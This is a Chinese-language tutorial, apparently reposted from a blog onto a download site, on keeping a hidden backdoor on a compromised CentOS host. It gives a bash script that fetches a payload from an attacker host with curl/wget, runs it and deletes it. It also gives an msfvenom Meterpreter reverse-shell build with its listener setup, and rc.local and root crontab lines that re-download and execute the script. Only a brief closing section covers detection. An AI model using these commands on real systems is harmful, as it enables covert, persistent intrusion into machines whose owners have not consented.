实验环境:

攻击主机:kali2022.3 IP192.168.1.53 开启apache2

目标主机:centos 7.6 ip192.168.1.63      

前提条件

1.已经获取到目标主机root权限

2.已经建立一个WEB网站并将脚本文件和后门程序存放到网站供下载

方式

通过在启动项和计划任务中添加下载执行脚本命令

目的

长期维持目标权限,隐藏后门

一、脚本内容

脚本文件jiaoben.sh保存在kali主机192.168.1.53web根目录下

#!/bin/bash

#通过curl命令或wget命令下载payload/tmp目录

curl -fsSL http://192.168.1.53/muma  -o /tmp/muma || wget -q http://192.168.1.53/muma  -O /tmp/muma

ls /tmp/muma

#添加后门执行权限

chmod +x /tmp/muma

#后台执行

nohup /tmp/muma &

#nohup 英文全称 no hang up(不挂起),用于在系统后台不挂断地运行命令,退出终端不会影响程序的运行。

#sleep 5秒再删除文件,删除太快可能导致payload还没有运行起来就被删除了。

sleep 5

#删除源文件

rm -rf /tmp/muma

二、生成木马

使用metasploit生成反弹木马

msfvenom -a x64 –platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -b “\x00” -f elf -o /var/www/html/muma

 

在kali主机上开启监听4444

加载模块

msf6 > use exploit/multi/handler

 

查看配置参数

msf6 exploit(multi/handler) > show options

 

配置payload

msf6 exploit(multi/handler) > set payload  linux/x64/meterpreter/reverse_tcp

 

配置反弹回来接收信息的主机

msf6 exploit(multi/handler) > set lhost 192.168.1.53

 

运行监听

msf6 exploit(multi/handler) > run

三、利用获取的权限在启动项中添加命令

 echo ” bash <(curl -s -L http://192.168.1.53/jiaoben.sh) >> /dev/null 2>&1″ >> /etc/rc.d/rc.loca

将命令“bash <(curl -s -L http://192.168.1.53/jiaoben.sh) >> /dev/null 2>&1”添加到启动项中

 注:

bash <() #表示将括号中的内容通过 bash 来执行curl -s -L

curl 是一个利用 URL 语法在命令行下进行文件传输的工具

-s –silent #表示静默模式不输出任何内容

-L 跟 http 连接,组合使用的效果是把 http 连接中的文件下载到内存中,然后传 bash,进行执 行

>> /dev/null 2>&1 #不输出任何信息

 

只要目标主机重新启动就会自动下载并执行脚本内容下载运行后门

四、在计划任务文件中添加命令

在kaili主机获取的shell上执行命令

crontab -e

进入vim编辑器,添加内容如下:

0 */1 * * * root bash <(curl -s -L http://192.168.1.53/jiaoben.sh) >>dev>null 2>&1

注:每小时的0分以root角色执行一次任务

五、查杀后门

存在问题:后门程序没有隐藏进程,很容易被细心的管理员发现

1、在目标主机上运行木马可以通过netstat ano命令查看建立连接的可疑端口

2、使用ps aux命令查看可以端口的进程

3、检查/etc/rc.d/rc.loca文件查看自启动项;命令:ntsysv 查看当前系统开启自启动的服务项

4、查看计划任务文件

vim /etc/crontab    查看是否有未经允许的计划任务

 

原文地址:http://www.cnblogs.com/jihejihe/p/16909848.html

1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长! 2. 分享目的仅供大家学习和交流,请务用于商业用途! 3. 如果你也有好源码或者教程,可以到用户中心发布,分享有积分奖励和额外收入! 4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解! 5. 如有链接无法下载、失效或广告,请联系管理员处理! 6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需! 7. 如遇到加密压缩包,默认解压密码为"gltf",如遇到无法解压的请联系管理员! 8. 因为资源和程序源码均为可复制品,所以不支持任何理由的退款兑现,请斟酌后支付下载 声明:如果标题没有注明"已测试"或者"测试可用"等字样的资源源码均未经过站长测试.特别注意没有标注的源码不保证任何可用性